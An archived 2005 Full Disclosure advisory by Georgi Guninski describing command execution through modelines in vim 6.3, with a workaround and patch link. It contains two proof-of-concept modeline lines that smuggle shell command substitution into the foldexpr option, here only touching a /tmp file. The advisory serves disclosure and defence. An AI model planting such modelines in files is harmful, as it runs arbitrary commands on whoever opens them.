Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Help poor children in Uganda

From: Georgi Guninski <guninski () guninski com>
Date: Mon, 25 Jul 2005 18:33:00 +0300
Georgi Guninski security advisory #75, 2005

Help poor children in Uganda

Systems affected:
vim 6.3

Date: 25 July 2005

Legal Notice:
This Advisory is Copyright (c) 2005 Georgi Guninski.
You  may  not  modify   it   and   distribute   it   or   distribute   parts
of it without the author's written permission - this especially  applies  to
so called "vulnerabilities databases"  and  securityfocus,  microsoft,  cert
and mitre.
If   you   want    to    link    to    this    content    use    the    URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html
Anything in this document may change without notice.

Disclaimer:
The  information  in  this  advisory  is  believed   to   be   true   though
it may be false.
The opinions  expressed  in  this  advisory  and  program  are  my  own  and
not   of   any   company.    The   usual   standard   disclaimer    applies,
especially the fact that Georgi Guninski  is  not  liable  for  any  damages
caused by direct  or  indirect  use  of  the  information  or  functionality
provided  by  this  advisory  or  program.    Georgi   Guninski   bears   no
responsibility for  content  or  misuse  of  this  advisory  or  program  or
any derivatives thereof.

Description:

open file in vim 6.3 < 6.3.082 with modelines on, got owned.

Details:

--1--
vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"):
cannot be used in vulnerability databases.
-----

--2--
vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"):
cannot be used in vulnerability databases.
-----

Workaround:

1. (preferred)
Disable modelines via
set modelines=0
and/or
set nomodeline
in .vimrc

or
2.
upgrade to 6.3.082 - patch available at:
ftp://ftp.vim.org/pub/vim/patches/6.3/

-- 
where do you want bill gates to go today?



























_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: